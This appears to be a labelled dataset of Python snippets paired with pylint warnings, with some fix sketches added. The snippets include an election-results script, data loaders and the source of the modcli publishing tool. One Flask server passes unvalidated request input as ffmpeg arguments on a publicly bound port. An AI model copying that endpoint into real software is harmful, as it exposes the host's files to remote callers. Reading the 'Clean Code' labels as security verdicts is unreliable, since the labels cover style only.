code | label
---|---|
1 import sys
2 print('The command line arguments are:')
3 for i in sys.argv:
4 print(i)
5
6 print("python path is in ",sys.path) | Clean Code: No Issues Detected
|
1 def total(a=5,*numbers,**phonebook):
2 print('a',a)
3
4 #iterate over all positional arguments via the tuple
5 for item in numbers:
6 print('num_item',item)
7
8 #iterate over all keyword arguments via the dict
9 for first,second in phonebook.items():
10 print(first,second)
11
12 total(10,1,2,3,Name='zhuly',age=26)
| 1 - warning: keyword-arg-before-vararg
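pylint raises keyword-arg-before-vararg here because the defaulted a sits before *numbers, so a caller's first positional argument silently replaces the default. A minimal sketch of the usual fix, assuming a is meant to be keyword-only:

def total(*numbers, a=5, **phonebook):
    print('a', a)
    # iterate over all positional arguments via the tuple
    for item in numbers:
        print('num_item', item)
    # iterate over all keyword arguments via the dict
    for first, second in phonebook.items():
        print(first, second)

# every positional argument now lands in numbers; a must be passed by name
total(10, 1, 2, 3, a=26, Name='zhuly')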
|
1 from mymodule import sayhello,__version__
2
3 sayhello()
4 print('version:',__version__)
| Clean Code: No Issues Detected
|
1 import os
2 import csv
3
4 csvpath = os.path.join('election_data.csv')
5
6 #Variables
7 votes = 0
8 candidate_list = []
9 candidate_count = []
10 candidate_percent = []
11
12 with open("election_data.csv", "r") as in_file:
13 csv_reader = csv.reader(in_file)
14 header = next(csv_reader)
15
16 for row in csv_reader:
17 #Adds total number of votes
18 votes += 1
19 candidate = row[2]
20
21 #If a candidate is in Candidate List, indexes the candidate on Candidate List, finds the index on Candidate Count List, and increases their number of votes by 1
22 if candidate in candidate_list:
23 candidate_index = candidate_list.index(candidate)
24 candidate_count[candidate_index] += 1
25
26 #If a candidate is not in Candidate List, adds the candidate to Candidate List and starts their count at 1 on Candidate Count
27 else:
28 candidate_list.append(candidate)
29 candidate_count.append(1)
30
31 #Finds the percent of votes each candidate received, and adds the percentage to the Candidate Percent List
32 for e in range(len(candidate_list)):
33 vote_percent = round((candidate_count[e]/votes) * 100, 2)
34 candidate_percent.append(vote_percent)
35
36 #Finds the Overall Election Winner: the candidate with the highest vote count (candidate_list holds unique names, so max by occurrence count would always return the first candidate)
37 winning_candidate = candidate_list[candidate_count.index(max(candidate_count))]
38
39 #Print Results to Terminal
40
41 print("_____________________________")
42 print(" Election Results")
43 print("_____________________________")
44 print("Total Votes: " + str(votes))
45 print("_____________________________")
46 for e in range(len(candidate_list)):
47 print(f'{candidate_list[e]} : {candidate_count[e]} votes : {candidate_percent[e]}%')
48 print("_____________________________")
49 print("Winner: " + str(winning_candidate))
50 print("_____________________________")
51
52 #Create and write to Election_Results TXT File
53
54 outpath = os.path.join("Election_Results.txt")
55 txt_file = open("Election_Results.txt", "w")
56
57 txt_file.write("_____________________________\n")
58 txt_file.write(" Election Results\n")
59 txt_file.write("_____________________________\n")
60 txt_file.write("Total Votes: " + str(votes))
61 txt_file.write("\n_____________________________\n")
62 for e in range(len(candidate_list)):
63 txt_file.write(f'{candidate_list[e]} : {candidate_count[e]} votes : {candidate_percent[e]}%\n')
64 txt_file.write("_____________________________\n")
65 txt_file.write("Winner: " + str(winning_candidate))
66 txt_file.write("\n_____________________________")
67
68
69
70
71
72
| 12 - warning: unspecified-encoding
55 - warning: unspecified-encoding
55 - refactor: consider-using-with
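The two unspecified-encoding warnings and the consider-using-with note share one conventional fix: pass an explicit encoding to open() and let a with block own each file handle. A reduced sketch, assuming the same CSV layout as above:

import csv

with open("election_data.csv", "r", encoding="utf-8") as in_file:
    votes = sum(1 for _ in csv.reader(in_file)) - 1  # subtract the header row

# the with block closes the file even if a write raises
with open("Election_Results.txt", "w", encoding="utf-8") as txt_file:
    txt_file.write("Total Votes: " + str(votes) + "\n")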
|
1 from flask import Flask, request, jsonify
2 from subprocess import Popen, PIPE
3 import uuid
4 import os
5 import json
6
7 app = Flask("ffserver", static_url_path='')
8 processing = False
9
10 @app.route("/")
11 def root():
12 return app.send_static_file("index.html")
13
14 @app.route("/ffmpeg", methods=['POST'])
15 def ffmpeg():
16 global processing
17 if processing:
18 return jsonify({ "result": "processing..." })
19 processing = True
20
21 vidID = str(uuid.uuid4())
22 outDir = "static/" + vidID
23 os.makedirs(outDir)
24 cmd = request.json["cmd"].replace("ffmpeg ", "").replace("\"", "")
25 cmdArgs = ["ffmpeg", "-loglevel", "error"]
26 for c in cmd.split(" "):
27 cmdArgs.append(c)
28 proc = Popen(cmdArgs, cwd=outDir, stdout=PIPE, stderr=PIPE)
29 stdout, stderr = proc.communicate()
30
31 result = proc.wait()
32 processing = False
33 if result != 0:
34 os.rmdir(outDir)
35 return jsonify({"error": stderr})
36 return jsonify({ "result": vidID + "/" + cmdArgs[-1] })
37
38 if __name__ == "__main__":
39 app.run(host='0.0.0.0')
| 16 - warning: global-statement
28 - refactor: consider-using-with
29 - warning: unused-variable
5 - warning: unused-import
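The consider-using-with and unused-variable notes both target the Popen block at lines 28-31; a hedged sketch of the same steps in the style pylint expects, assuming ffmpeg is on PATH (the command here is illustrative), with the never-read stdout bound to _:

from subprocess import Popen, PIPE

cmd_args = ["ffmpeg", "-loglevel", "error", "-version"]  # illustrative command
with Popen(cmd_args, stdout=PIPE, stderr=PIPE) as proc:
    _, stderr = proc.communicate()  # stdout is never read, hence _
    result = proc.returncode        # communicate() already waited

The unused-import note is cleared by deleting the import json line.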
|
1 import os
2 import pandas as pd
3 import numpy as np
4
5 def load_data_by_fid(fid):
6 '''
7 return a dataframe that has the eid and the 'fid' variable
8 '''
9 df_tab1_i0_comp=pd.read_csv('/temp_project/ukbb/data/i0/ukb22598_i0_comp.csv')
10
11 if int(fid) in df_tab1_i0_comp.fid.values.tolist():
12 fid_num=fid
13
14 var_description = df_tab1_i0_comp[df_tab1_i0_comp['fid']==int(fid_num)].Description.values[0]
15 var_type=df_tab1_i0_comp[df_tab1_i0_comp['fid']==int(fid_num)].Type.values[0]
16
17 var_type_list=['con','cur','dat','int','tex','tim','cas','cam']
18 var_type_list_full=['Continuous','Curve','Date','Integer','Text','Time','Categorical (single)', 'Categorical (multiple)']
19
20 path_p1='/temp_project/ukbb/data/i0/var_'
21
22 if var_type in var_type_list_full:
23 vtyp=var_type_list[var_type_list_full.index(var_type)]
24
25 loadpath=path_p1+str(vtyp)+'/'
26 os.chdir(path_p1+str(vtyp))
27 list_folder=os.listdir()
28
29 pname1=str(vtyp)+str(fid_num)+'i0.csv'
30 pname2='vec_'+str(vtyp)+str(fid_num)+'i0.csv'
31
32 if pname1 in list_folder:
33
34 print('fid ' + str(fid_num) + ' is a single-measure '+str(var_type).lower()+' variable, which is \n'+str(var_description))
35 fpname=list_folder[list_folder.index(pname1)]
36 df_load=pd.read_csv(loadpath+fpname)
37
38 elif pname2 in list_folder:
39
40 print('fid ' + str(fid_num) + ' is a single-measure '+str(var_type).lower()+' variable, which is \n'+str(var_description))
41 fpname=list_folder[list_folder.index(pname2)]
42 df_load=pd.read_csv(loadpath+fpname, sep='\t')
43 return df_load
44
45 else:
46 print('fid not found, please try again')
| 11 - refactor: no-else-return
25 - error: possibly-used-before-assignment
43 - error: possibly-used-before-assignment
5 - refactor: inconsistent-return-statements
3 - warning: unused-import
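All of these notes stem from control flow: vtyp and df_load are bound only on some branches, and the function returns a value on one path while falling off the end on others. A minimal sketch of the shape pylint expects (the names and paths here are placeholders, not the real dataset):

def load_data_by_fid_sketch(fid, known_fids):
    df_load = None                    # bound on every path
    if int(fid) in known_fids:
        vtyp = 'con'                  # bound before first use
        df_load = 'var_' + vtyp + '/' + str(fid) + 'i0.csv'  # stand-in for pd.read_csv
    else:
        print('fid not found, please try again')
    return df_load                    # one consistent return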
|
1 import json
2 import os
3
4
5 def read_json_file(path: str):
6 if not os.path.isfile(path):
7 return {}
8 with open(path, 'r') as file:
9 contents = file.read()
10 return json.loads(contents)
| 8 - warning: unspecified-encoding
|
1 import re
2 import sys
3
4 from setuptools import setup
5
6 with open('modcli/__init__.py', 'r') as fh:
7 version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', fh.read(), re.MULTILINE).group(1)
8
9 if sys.version_info[0] < 3:
10 raise Exception("Must be using Python 3")
11
12 setup(
13 name='mod-devel-cli',
14 python_requires='>=3',
15 version=version,
16 description='MOD Command Line Interface',
17 author='Alexandre Cunha',
18 author_email='alex@moddevices.com',
19 license='Proprietary',
20 install_requires=[
21 'click==6.7',
22 'crayons==0.1.2',
23 'requests>=2.18.4',
24 ],
25 packages=[
26 'modcli',
27 ],
28 entry_points={
29 'console_scripts': [
30 'modcli = modcli.cli:main',
31 ]
32 },
33 classifiers=[
34 'Intended Audience :: Developers',
35 'Natural Language :: English',
36 'Operating System :: OS Independent',
37 'Programming Language :: Python',
38 'Programming Language :: Python :: 3',
39 ],
40 url='http://moddevices.com/',
41 )
| 6 - warning: unspecified-encoding
10 - warning: broad-exception-raised
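Two small changes cover both notes, assuming the same file layout: an explicit encoding on open() and a concrete exception class in place of the bare Exception:

import re
import sys

with open('modcli/__init__.py', 'r', encoding='utf-8') as fh:
    version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
                        fh.read(), re.MULTILINE).group(1)

if sys.version_info[0] < 3:
    raise RuntimeError("Must be using Python 3")  # specific type, same behaviour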
|
1 import os
2
3 CONFIG_DIR = os.path.expanduser('~/.config/modcli')
4 URLS = {
5 'labs': ('https://api-labs.moddevices.com/v2', 'https://pipeline-labs.moddevices.com/bundle/'),
6 'dev': ('https://api-dev.moddevices.com/v2', 'https://pipeline-dev.moddevices.com/bundle/'),
7 }
8 DEFAULT_ENV = 'labs'
| Clean Code: No Issues Detected
|
1 import os
2 import shutil
3 import subprocess
4 import tempfile
5 from hashlib import md5
6
7 import click
8 import crayons
9 import requests
10
11 from modcli import context
12 from modcli.utils import read_json_file
13
14
15 def publish(project_file: str, packages_path: str, keep_environment: bool=False, bundles: list=None,
16 show_result: bool=False, rebuild: bool=False, env_name: str=None, force: bool=False):
17 project_file = os.path.realpath(project_file)
18 packages_path = os.path.realpath(packages_path) if packages_path else None
19
20 env = context.get_env(env_name)
21 if not env.token:
22 raise Exception('You must authenticate first')
23
24 if not os.path.isfile(project_file):
25 raise Exception('File {0} not found or not a valid file'.format(project_file))
26
27 if packages_path:
28 if not os.path.isdir(packages_path):
29 raise Exception('Packages path {0} not found'.format(packages_path))
30 else:
31 packages_path = os.path.dirname(project_file)
32
33 project = os.path.split(project_file)[1]
34 if not force and not click.confirm('Project {0} will be compiled and published in [{1}], '
35 'do you confirm?'.format(crayons.green(project), crayons.green(env.name))):
36 raise Exception('Cancelled')
37
38 process = read_json_file(project_file)
39
40 # setting up process data
41 if keep_environment:
42 process['keep_environment'] = True
43 process['rebuild'] = rebuild
44 buildroot_pkg = process.pop('buildroot_pkg', None)
45 mk_filename = '{0}.mk'.format(buildroot_pkg)
46 if not buildroot_pkg:
47 raise Exception('Missing buildroot_pkg in project file')
48 if bundles:
49 process['bundles'] = [b for b in process['bundles'] if b['name'] in bundles]
50 if not process['bundles']:
51 raise Exception('Could not match any bundle from: {0}'.format(bundles))
52
53 # find buildroot_pkg under packages_path
54 mk_path = next((i[0] for i in os.walk(packages_path) if mk_filename in i[2]), None)
55 if not mk_path:
56 raise Exception('Could not find buildroot mk file for package {0} in {1}'.format(buildroot_pkg, packages_path))
57 basename = os.path.basename(mk_path)
58 if basename != buildroot_pkg:
59 raise Exception('The package folder containing the .mk file has to be named {0}'.format(buildroot_pkg))
60 pkg_path = os.path.dirname(mk_path)
61
62 work_dir = tempfile.mkdtemp()
63 try:
64 package = '{0}.tar.gz'.format(buildroot_pkg)
65 source_path = os.path.join(work_dir, package)
66 try:
67 subprocess.check_output(
68 ['tar', 'zhcf', source_path, buildroot_pkg], stderr=subprocess.STDOUT, cwd=os.path.join(pkg_path)
69 )
70 except subprocess.CalledProcessError as ex:
71 raise Exception(ex.output.decode())
72
73 click.echo('Submitting release process for project {0} using file {1}'.format(project_file, package))
74 click.echo('URL: {0}'.format(env.bundle_url))
75
76 headers = {'Authorization': 'MOD {0}'.format(env.token)}
77
78 result = requests.post('{0}/'.format(env.bundle_url), json=process, headers=headers)
79 if result.status_code == 401:
80 raise Exception('Invalid token - please authenticate (see \'modcli auth\')')
81 elif result.status_code != 200:
82 raise Exception('Error: {0}'.format(result.text))
83 release_process = result.json()
84
85 click.echo('Release process created: {0}'.format(release_process['id']))
86 click.echo('Uploading buildroot package {0} ...'.format(package))
87 with open(source_path, 'rb') as fh:
88 data = fh.read()
89 headers = {'Content-Type': 'application/octet-stream'}
90 result = requests.post(release_process['source-href'], data=data, headers=headers)
91 if result.status_code == 401:
92 raise Exception('Invalid token - please authenticate (see \'modcli auth\')')
93 elif result.status_code != 201:
94 raise Exception('Error: {0}'.format(result.text))
95 checksum = result.text.lstrip('"').rstrip('"')
96
97 result_checksum = md5(data).hexdigest()
98 if checksum == result_checksum:
99 click.echo('Checksum match ok!')
100 else:
101 raise Exception('Checksum mismatch: {0} <> {1}'.format(checksum, result_checksum))
102 finally:
103 click.echo('Cleaning up...')
104 shutil.rmtree(work_dir, ignore_errors=True)
105
106 release_process_url = release_process['href']
107 click.echo(crayons.blue('Process url: {0}?pretty=true'.format(release_process_url)))
108 click.echo(crayons.green('Done'))
109 if show_result:
110 click.echo('Retrieving release process from {0} ...'.format(release_process_url))
111 release_process_full = requests.get('{0}?pretty=true'.format(release_process_url)).text
112 click.echo(crayons.blue('================ Release Process {0} ================'.format(release_process['id'])))
113 click.echo(release_process_full)
114 click.echo(crayons.blue('================ End Release Process ================'))
| 15 - refactor: too-many-arguments
15 - refactor: too-many-positional-arguments
15 - refactor: too-many-locals
22 - warning: broad-exception-raised
25 - warning: broad-exception-raised
29 - warning: broad-exception-raised
36 - warning: broad-exception-raised
47 - warning: broad-exception-raised
51 - warning: broad-exception-raised
56 - warning: broad-exception-raised
59 - warning: broad-exception-raised
71 - warning: raise-missing-from
71 - warning: broad-exception-raised
78 - warning: missing-timeout
79 - refactor: no-else-raise
80 - warning: broad-exception-raised
82 - warning: broad-exception-raised
90 - warning: missing-timeout
91 - refactor: no-else-raise
92 - warning: broad-exception-raised
94 - warning: broad-exception-raised
101 - warning: broad-exception-raised
111 - warning: missing-timeout
15 - refactor: too-many-branches
15 - refactor: too-many-statements
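Most of the warnings above repeat three patterns. A hedged sketch of the corresponding fixes; PublishError is an invented name for illustration, and the 30-second timeout is an assumption rather than a project value:

import subprocess
import requests

class PublishError(Exception):
    """Domain-specific exception; avoids broad-exception-raised."""

def post_with_timeout(url, **kwargs):
    # missing-timeout: bound how long a request may block
    return requests.post(url, timeout=30, **kwargs)

def pack_sources(source_path, pkg, cwd):
    try:
        subprocess.check_output(['tar', 'zhcf', source_path, pkg],
                                stderr=subprocess.STDOUT, cwd=cwd)
    except subprocess.CalledProcessError as ex:
        # raise-missing-from: chain the original cause explicitly
        raise PublishError(ex.output.decode()) from ex

The no-else-raise notes disappear by dropping the elif after a raise, since control cannot continue past it.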
|
1 import click
2 import crayons
3
4 from modcli import context, auth, __version__, bundle
5
6 _sso_disclaimer = '''SSO login requires you have a valid account in MOD Forum (https://forum.moddevices.com).
7 If your browser has an active session the credentials will be used for this login. Confirm?'''
8
9
10 @click.group(context_settings=dict(help_option_names=['-h', '--help']))
11 @click.version_option(prog_name='modcli', version=__version__)
12 def main():
13 pass
14
15
16 @click.group(name='auth', help='Authentication commands')
17 def auth_group():
18 pass
19
20
21 @click.group(name='bundle', help='LV2 bundle commands')
22 def bundle_group():
23 pass
24
25
26 @click.group(name='config', help='Configuration commands')
27 def config_group():
28 pass
29
30
31 @click.command(help='Authenticate user with SSO (MOD Forum)')
32 @click.option('-s', '--show-token', type=bool, help='Print the JWT token obtained', is_flag=True)
33 @click.option('-o', '--one-time', type=bool, help='Only print token once (do not store it)', is_flag=True)
34 @click.option('-y', '--confirm-all', type=bool, help='Confirm all operations', is_flag=True)
35 @click.option('-d', '--detached-mode', type=bool, help='Run process without opening a local browser', is_flag=True)
36 @click.option('-e', '--env_name', type=str, help='Switch to environment before authenticating')
37 def login_sso(show_token: bool, one_time: bool, confirm_all: bool, detached_mode: bool, env_name: str):
38 if env_name:
39 context.set_active_env(env_name)
40 env = context.current_env()
41 if not confirm_all:
42 response = click.confirm(_sso_disclaimer)
43 if not response:
44 exit(1)
45 if not one_time:
46 click.echo('Logging in to [{0}]...'.format(env.name))
47
48 try:
49 if detached_mode:
50 token = auth.login_sso_detached(env.api_url)
51 else:
52 token = auth.login_sso(env.api_url)
53 except Exception as ex:
54 click.echo(crayons.red(str(ex)), err=True)
55 exit(1)
56 return
57
58 if not one_time:
59 env.set_token(token)
60 context.save()
61
62 if show_token or one_time:
63 print(token.strip())
64 else:
65 click.echo(crayons.green('You\'re now logged in as [{0}] in [{1}].'.format(env.username, env.name)))
66
67
68 @click.command(help='Authenticate user')
69 @click.option('-u', '--username', type=str, prompt=True, help='User ID')
70 @click.option('-p', '--password', type=str, prompt=True, hide_input=True, help='User password')
71 @click.option('-s', '--show-token', type=bool, help='Print the JWT token obtained', is_flag=True)
72 @click.option('-o', '--one-time', type=bool, help='Only print token once (do not store it)', is_flag=True)
73 @click.option('-e', '--env_name', type=str, help='Switch to environment before authenticating')
74 def login(username: str, password: str, show_token: bool, one_time: bool, env_name: str):
75 if env_name:
76 context.set_active_env(env_name)
77 env = context.current_env()
78 if not one_time:
79 click.echo('Logging in to [{0}]...'.format(env.name))
80 try:
81 token = auth.login(username, password, env.api_url)
82 except Exception as ex:
83 click.echo(crayons.red(str(ex)), err=True)
84 exit(1)
85 return
86
87 if not one_time:
88 env.set_token(token)
89 context.save()
90
91 if show_token or one_time:
92 print(token.strip())
93 else:
94 click.echo(crayons.green('You\'re now logged in as [{0}] in [{1}].'.format(username, env.name)))
95
96
97 @click.command(help='Remove all tokens and reset context data')
98 def clear_context():
99 try:
100 context.clear()
101 except Exception as ex:
102 click.echo(crayons.red(str(ex)), err=True)
103 exit(1)
104 return
105 click.echo(crayons.green('Context cleared'))
106
107
108 @click.command(help='Show current active access JWT token')
109 @click.option('-e', '--env_name', type=str, help='Show current active token from a specific environment')
110 def active_token(env_name: str):
111 if env_name:
112 context.set_active_env(env_name)
113 token = context.active_token()
114 if not token:
115 click.echo(crayons.red('You must authenticate first.'), err=True)
116 click.echo('Try:\n $ modcli auth login')
117 exit(1)
118 return
119
120 click.echo(token)
121
122
123 @click.command(help='Set active environment, where ENV_NAME is the name')
124 @click.argument('env_name')
125 def set_active_env(env_name: str):
126 try:
127 context.set_active_env(env_name)
128 context.save()
129 except Exception as ex:
130 click.echo(crayons.red(str(ex)), err=True)
131 exit(1)
132 return
133
134 click.echo(crayons.green('Current environment set to: {0}'.format(env_name)))
135
136
137 @click.command(help='Add new environment, where ENV_NAME is the name, API_URL '
138 'and BUNDLE_URL are the API entry points')
139 @click.argument('env_name')
140 @click.argument('api_url')
141 @click.argument('bundle_url')
142 def add_env(env_name: str, api_url: str, bundle_url: str):
143 try:
144 context.add_env(env_name, api_url, bundle_url)
145 context.set_active_env(env_name)
146 context.save()
147 except Exception as ex:
148 click.echo(crayons.red(str(ex)), err=True)
149 exit(1)
150 return
151
152 click.echo(crayons.green('Environment [{0}] added and set as active'.format(env_name)))
153
154
155 @click.command(help='List current configuration', name='list')
156 def list_config():
157 env = context.current_env()
158 click.echo('Active environment: {0}'.format(env.name))
159 click.echo('Authenticated in [{0}]: {1}'.format(env.name, 'Yes' if env.token else 'No'))
160 click.echo('Registered environments: {0}'.format(list(context.environments.keys())))
161
162
163 @click.command(help='Publish LV2 bundles, where PROJECT_FILE points to the buildroot project descriptor file (JSON)')
164 @click.argument('project_file')
165 @click.option('-p', '--packages-path', type=str, help='Path to buildroot package')
166 @click.option('-s', '--show-result', type=bool, help='Print pipeline process result', is_flag=True)
167 @click.option('-k', '--keep-environment', type=bool, help='Don\'t remove build environment after build', is_flag=True)
168 @click.option('-r', '--rebuild', type=bool, help='Don\'t increment release number, just rebuild', is_flag=True)
169 @click.option('-e', '--env', type=str, help='Environment where the bundles will be published')
170 @click.option('-f', '--force', type=bool, help='Don\'t ask for confirmation', is_flag=True)
171 def publish(project_file: str, packages_path: str, show_result: bool, keep_environment: bool,
172 rebuild: bool, env: str, force: bool):
173 try:
174 bundle.publish(project_file, packages_path, show_result=show_result,
175 keep_environment=keep_environment, rebuild=rebuild, env_name=env, force=force)
176 except Exception as ex:
177 click.echo(crayons.red(str(ex)), err=True)
178 exit(1)
179 return
180
181
182 auth_group.add_command(active_token)
183 auth_group.add_command(login)
184 auth_group.add_command(login_sso)
185 bundle_group.add_command(publish)
186 config_group.add_command(add_env)
187 config_group.add_command(set_active_env)
188 config_group.add_command(list_config)
189 config_group.add_command(clear_context)
190 main.add_command(auth_group)
191 main.add_command(bundle_group)
192 main.add_command(config_group)
193
194
195 if __name__ == '__main__':
196 main()
| 10 - refactor: use-dict-literal
44 - refactor: consider-using-sys-exit
53 - warning: broad-exception-caught
56 - warning: unreachable
55 - refactor: consider-using-sys-exit
82 - warning: broad-exception-caught
85 - warning: unreachable
84 - refactor: consider-using-sys-exit
101 - warning: broad-exception-caught
104 - warning: unreachable
103 - refactor: consider-using-sys-exit
118 - warning: unreachable
117 - refactor: consider-using-sys-exit
129 - warning: broad-exception-caught
132 - warning: unreachable
131 - refactor: consider-using-sys-exit
147 - warning: broad-exception-caught
150 - warning: unreachable
149 - refactor: consider-using-sys-exit
171 - refactor: too-many-arguments
171 - refactor: too-many-positional-arguments
176 - warning: broad-exception-caught
179 - warning: unreachable
178 - refactor: consider-using-sys-exit
171 - refactor: useless-return
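The unreachable/consider-using-sys-exit pairs all come from the exit(1) followed by return idiom: sys.exit raises SystemExit, so the trailing return can never run. The use-dict-literal note is the dict(...) call on line 10. A sketch of both fixes in the same style as the module:

import sys
import click
import crayons

@click.group(context_settings={'help_option_names': ['-h', '--help']})  # dict literal
def main():
    pass

def fail(message):
    click.echo(crayons.red(message), err=True)
    sys.exit(1)  # raises SystemExit; no unreachable return needed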
|
1 from modcli import config
2
3 __version__ = '1.1.3'
4
5 context = config.read_context()
| Clean Code: No Issues Detected
|
1 import socket
2 import webbrowser
3 from http.server import BaseHTTPRequestHandler, HTTPServer
4 from urllib import parse
5
6 import click
7 import requests
8 from click import Abort
9
10 from modcli import __version__
11
12
13 def login(username: str, password: str, api_url: str):
14 result = requests.post('{0}/users/tokens'.format(api_url), json={
15 'user_id': username,
16 'password': password,
17 'agent': 'modcli:{0}'.format(__version__),
18 })
19 if result.status_code != 200:
20 raise Exception('Error: {0}'.format(result.json()['error-message']))
21 return result.json()['message'].strip()
22
23
24 def get_open_port():
25 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
26 s.bind(("", 0))
27 s.listen(1)
28 port = s.getsockname()[1]
29 s.close()
30 return port
31
32
33 def login_sso_detached(api_url: str):
34 click.echo('Running in detached mode...')
35 click.echo('1) Open this url in any browser: {0}'.format('{0}/users/tokens_sso'.format(api_url)))
36 click.echo('2) The URL will automatically redirect to MOD Forum (https://forum.moddevices.com)')
37 click.echo('3) Once MOD Forum page loads, if asked, enter your credentials or register a new user')
38 click.echo('4) A JWT token will be displayed in your browser')
39 try:
40 token = click.prompt('Copy the token value and paste it here, then press ENTER')
41 return token.strip()
42 except Abort:
43 exit(1)
44
45
46 def login_sso(api_url: str):
47 server_host = 'localhost'
48 server_port = get_open_port()
49 local_server = 'http://{0}:{1}'.format(server_host, server_port)
50
51 class SSORequestHandler(BaseHTTPRequestHandler):
52 token = ''
53
54 def do_HEAD(self):
55 self.send_response(200)
56 self.send_header('Content-type', 'text/html')
57 self.end_headers()
58
59 def do_GET(self):
60 response = self.handle_http(200)
61 _, _, _, query, _ = parse.urlsplit(self.path)
62 result = parse.parse_qs(query)
63 tokens = result.get('token', None)
64 SSORequestHandler.token = tokens[0] if tokens else None
65 self.wfile.write(response)
66
67 def handle_http(self, status_code):
68 self.send_response(status_code)
69 self.send_header('Content-type', 'text/html')
70 self.end_headers()
71 content = '''
72 <html><head><title>modcli - success</title></head>
73 <body>Authentication successful! This browser window can be closed.</body></html>
74 '''
75 return bytes(content, 'UTF-8')
76
77 def log_message(self, format, *args):
78 pass
79
80 httpd = HTTPServer((server_host, server_port), SSORequestHandler)
81 httpd.timeout = 30
82
83 webbrowser.open('{0}/users/tokens_sso?local_url={1}'.format(api_url, local_server))
84
85 try:
86 httpd.handle_request()
87 except KeyboardInterrupt:
88 pass
89
90 token = SSORequestHandler.token
91 if not token:
92 raise Exception('Authentication failed!')
93 return token
| 14 - warning: missing-timeout
20 - warning: broad-exception-raised
43 - refactor: consider-using-sys-exit
33 - refactor: inconsistent-return-statements
77 - warning: redefined-builtin
92 - warning: broad-exception-raised
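The redefined-builtin note points at log_message's format parameter, a name inherited from BaseHTTPRequestHandler's own signature; since the argument is passed positionally, a local rename is the usual remedy:

from http.server import BaseHTTPRequestHandler

class QuietHandler(BaseHTTPRequestHandler):
    def log_message(self, fmt, *args):  # renamed: no longer shadows format()
        pass  # suppress per-request logging, as in the original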
|
1 import base64
2 import json
3 import os
4 import stat
5
6 import re
7
8 from modcli import settings
9 from modcli.utils import read_json_file
10
11
12 def read_context():
13 context = CliContext.read(settings.CONFIG_DIR)
14 if len(context.environments) == 0:
15 for env_name, urls in settings.URLS.items():
16 context.add_env(env_name, urls[0], urls[1])
17 context.set_active_env(settings.DEFAULT_ENV)
18 context.save()
19 return context
20
21
22 def clear_context():
23 CliContext.clear(settings.CONFIG_DIR)
24
25
26 def _write_file(path: str, data: str, remove_existing: bool=True):
27 # create dir if it doesn't exist
28 dirname = os.path.dirname(path)
29 if not os.path.isdir(dirname):
30 os.makedirs(dirname, exist_ok=True)
31 # remove previous file
32 if remove_existing:
33 if os.path.isfile(path):
34 os.remove(path)
35 # write json file
36 with os.fdopen(os.open(path, os.O_WRONLY | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR), 'w') as fh:
37 fh.write(data)
38 fh.writelines(os.linesep)
39
40
41 def _write_json_file(path: str, data: dict, remove_existing: bool=True):
42 _write_file(path, json.dumps(data, indent=4), remove_existing)
43
44
45 def _remove_file(path: str):
46 if os.path.isfile(path):
47 os.remove(path)
48
49
50 class CliContext(object):
51 _filename = 'context.json'
52 _access_token_filename = 'access_token'
53
54 @staticmethod
55 def read(path: str):
56 context = CliContext(path)
57 data = read_json_file(os.path.join(path, CliContext._filename))
58 if not data:
59 return context
60 for env_data in data['environments']:
61 context.add_env(env_data['name'], env_data['api_url'], env_data['bundle_url'])
62 env = context.environments[env_data['name']]
63 env.username = env_data['username']
64 env.token = env_data['token']
65 env.exp = env_data['exp']
66 context.set_active_env(data['active_env'])
67 return context
68
69 def __init__(self, path: str):
70 self._path = path
71 self._active_env = ''
72 self.environments = {}
73
74 def _ensure_env(self, env_name: str):
75 if env_name not in self.environments:
76 raise Exception('Environment {0} doesn\'t exist'.format(env_name))
77
78 def set_active_env(self, env_name: str):
79 if not env_name:
80 self._active_env = ''
81 else:
82 self._ensure_env(env_name)
83 self._active_env = env_name
84
85 def add_env(self, env_name: str, api_url: str, bundle_url: str):
86 if not env_name:
87 raise Exception('Environment name is invalid')
88 if env_name in self.environments:
89 raise Exception('Environment {0} already exists'.format(env_name))
90 if not re.match('https?://.*', api_url):
91 raise Exception('Invalid api_url: {0}'.format(api_url))
92 if not re.match('https?://.*', bundle_url):
93 raise Exception('Invalid bundle_url: {0}'.format(bundle_url))
94
95 self.environments[env_name] = EnvSettings(env_name, api_url, bundle_url)
96
97 def remove_env(self, env_name: str):
98 self._ensure_env(env_name)
99 del self.environments[env_name]
100
101 def active_token(self):
102 return self.current_env().token
103
104 def current_env(self):
105 if not self._active_env:
106 raise Exception('No environment has been set')
107 return self.environments[self._active_env]
108
109 def get_env(self, env_name: str=None):
110 if not env_name:
111 return self.current_env()
112 self._ensure_env(env_name)
113 return self.environments[env_name]
114
115 def save(self):
116 data = {
117 'active_env': self._active_env,
118 'environments': list({
119 'name': e.name,
120 'api_url': e.api_url,
121 'bundle_url': e.bundle_url,
122 'username': e.username,
123 'token': e.token,
124 'exp': e.exp,
125 } for e in self.environments.values())
126 }
127 _write_json_file(os.path.join(self._path, CliContext._filename), data)
128 active_token = self.active_token()
129 if active_token:
130 _write_file(os.path.join(self._path, CliContext._access_token_filename), active_token)
131 else:
132 _remove_file(os.path.join(self._path, CliContext._access_token_filename))
133
134 def clear(self):
135 _remove_file(os.path.join(self._path, CliContext._filename))
136 _remove_file(os.path.join(self._path, CliContext._access_token_filename))
137 self.environments.clear()
138
139
140 class EnvSettings(object):
141
142 def __init__(self, name: str, api_url: str, bundle_url: str):
143 self.name = name
144 self.api_url = api_url.rstrip('/')
145 self.bundle_url = bundle_url.rstrip('/')
146 self.username = ''
147 self.token = ''
148 self.exp = ''
149
150 def set_token(self, token: str):
151 _, payload, _ = token.split('.')
152 payload_data = json.loads(base64.urlsafe_b64decode(payload + '=' * (-len(payload) % 4)).decode())
153 username = payload_data['user_id']
154 exp = payload_data.get('exp', None)
155
156 self.username = username
157 self.token = token
158 self.exp = exp
| 50 - refactor: useless-object-inheritance
76 - warning: broad-exception-raised
87 - warning: broad-exception-raised
89 - warning: broad-exception-raised
91 - warning: broad-exception-raised
93 - warning: broad-exception-raised
106 - warning: broad-exception-raised
140 - refactor: useless-object-inheritance
140 - refactor: too-few-public-methods
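Both useless-object-inheritance notes flag the same Python 2 habit; in Python 3 every class is new-style, so the plain form is equivalent:

class CliContext:
    ...

class EnvSettings:
    ...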
|
1 # -*- coding:utf-8 -*-
2
3 from redis import Redis
4
5 # Boundary indexes for Redis lists
6 LEFTMOST = 0
7 RIGHTMOST = -1
8
9
10 class RedisListSecondPack:
11
12 def __init__(self, name, client=Redis()):
13 self.name = name
14 self.client = client
15
